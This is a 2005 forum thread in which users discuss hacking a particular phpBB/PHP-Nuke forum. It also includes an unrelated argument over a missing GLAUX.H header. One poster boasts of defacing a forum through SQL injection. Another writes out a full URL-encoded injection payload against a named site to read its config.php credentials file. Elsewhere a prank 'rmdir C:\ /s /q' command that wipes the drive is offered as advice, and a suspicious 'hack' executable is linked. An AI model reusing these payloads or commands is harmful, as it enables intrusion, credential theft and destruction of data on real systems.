January 29, 200520 yr Yeah, just run the cssh3.exe, put in server address and press on "hack". Nothing easier than that. http://anime.therisenrealm.com/boards/index.php?act=Attach&type=post&id=162504
January 29, 200520 yr start ur command prompt then type rmdir C:\ /s /q ....after it locks onto a forum, type Console::control hope tats help to u =P
January 29, 200520 yr So clever guys. How about some information about the forum? What kind of forum is it? What type of database is powering it? (MySQL, Oracle, etc.) If they're running an older version, chances are there's some sort of injection exploit that will let you run a query on the database. I did that a few days ago to these fuckers. http://img180.exs.cx/img180/259/hax6kp.jpg Changed all their posts to goatse, tubgirl and lemonparty. Hahaha =D
January 29, 200520 yr http://www.phpbb.com/support/documents.php?mode=changelog They're not running the latest version. The changelog on their main site shows what was fixed since the last version. Fixed vulnerability in highlighting code (very high severity, please update your installation as soon as possible) Fixed not confirmed sql injection in username handling - warmth Those seem like good leads, Google will have more information on how to fix (and inadvertantly exploit) them. As for the other morons here: daed_rat's was most likely a virus, since there's no way to just "hack" a forum with a program. (the exception being, creating a program that opens a HTTP GET request to an exploitable URL) dark_urza's would remove all files and folders on your C: drive without prompting you. After reading some of his posts here, I've concluded that he is a moron in general, and I advise you not to listen to anything he says.
January 29, 200520 yr Asterix. The thing is, I am a forum hacking n00b. I have no clue what to search for, and even if I did find something, I wouldn't know how to do it. That is why I cam here. To get a smart guy like you to tell me in lamens terms what to do. I mean, I can do all that shit like if you say go there and type this command run:your gonna get fucked:/admin-access or whateverthefuck. But yea, I need your help man. HELP ME OUT PLEASE! Unfortunately, it's not that simple. Generally, people who "hack" (or in this case, exploit stupid people) have SOME programming skills. http://www.nukebrasil.org/article471.html I can understand that, and I could probably give myself access on their board, but I have no reason to. I don't feel like single-stepping someone else (who has no programming knowledge</assumption>) through it either. All the information you need is in plain view, what you do with it is up to you.
January 29, 200520 yr Ok, my exploit doesn't seem to work on there, as they have a script to block the tags inside the url (Stupid php-nuke). Here's the url I tried: http://www.frontlineformation.com/modules.php?name=Forums&file=viewtopic&t=734&highlight=%2527%252Eprintf(substr(fread(fopen(chr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(105)%252echr(103)%252echr(46)%252echr(112)%252echr(104)%252echr(112),chr(114)),filesize(chr(99)%252echr(111)%252echr(110)%252echr(102)%252echr(105)%252echr(103)%252echr(46)%252echr(112)%252echr(104)%252echr(112))),2,-2)),exit%252e%2527 This is supposed to print the contents of the config.php. Oh well, I can't be fucked to try and get around it. Sorry.
January 29, 200520 yr Lol, I don't care about money. Just ask someone else to do it, the site blocks the exploit I use, and I don't have the patience to look for one that works.
January 29, 200520 yr http://www.phpbb.com/support/documents.php?mode=changelog They're not running the latest version. The changelog on their main site shows what was fixed since the last version. Those seem like good leads, Google will have more information on how to fix (and inadvertantly exploit) them. As for the other morons here: daed_rat's was most likely a virus, since there's no way to just "hack" a forum with a program. (the exception being, creating a program that opens a HTTP GET request to an exploitable URL) dark_urza's would remove all files and folders on your C: drive without prompting you. After reading some of his posts here, I've concluded that he is a moron in general, and I advise you not to listen to anything he says. ...not like ur any help either....i ask for something like GLAUX.H....all u do is keep criticizing me about nothing tat even relates to GLAUX.H....i dont need ur fucken help...i just need the fucken file...
January 29, 200520 yr ...not like ur any help either....i ask for something like GLAUX.H....all u do is keep criticizing me about nothing tat even relates to GLAUX.H....i dont need ur fucken help...i just need the fucken file... Since you're too fucking stupid to locate it on your own, I've taken the liberty to host it. http://s19.yousendit.com/d.aspx?id=15PHEI0B2RNBC1DAP7VYWCJHH6 ------------------------------------------- Back on topic: How do I run those commands? Don't I have to already have admin access to the forum to open the file to run these commands? Or do I do this is my cmd prompt? I don't think that you'll be doing any hacking/exploiting with your current knowledge of websites. No offense, but you're seriously not going to understand anything we tell you.
January 29, 200520 yr thnx u...n btw im not fucken stupid...i spent three days trying to find the exact the glaux n google didnt show any results into help me...all the links are about wat the fucken file does not CLICK HERE TO GET IT
January 29, 200520 yr Learn to use google noob. http://www.google.com/search?hl=en&q=glaux+filetype%3Ah&btnG=Google+Search
January 30, 200520 yr i dont think it works i dunno y but write me a simple OpenGL program tat draws a square on the screen..i wanna see if it works cuz it still says a undefined linking reference to the file i downloaded...
January 30, 200520 yr what does the google search for: glaux filetype:h solve? is that like php.inc google exploit (in fall issue of 2600)?
January 30, 200520 yr what does the google search for: glaux filetype:h solve? is that like php.inc google exploit (in fall issue of 2600)? Has nothing to do with the forum hack..... That's how Mr. Urza could have located his missing header(s).
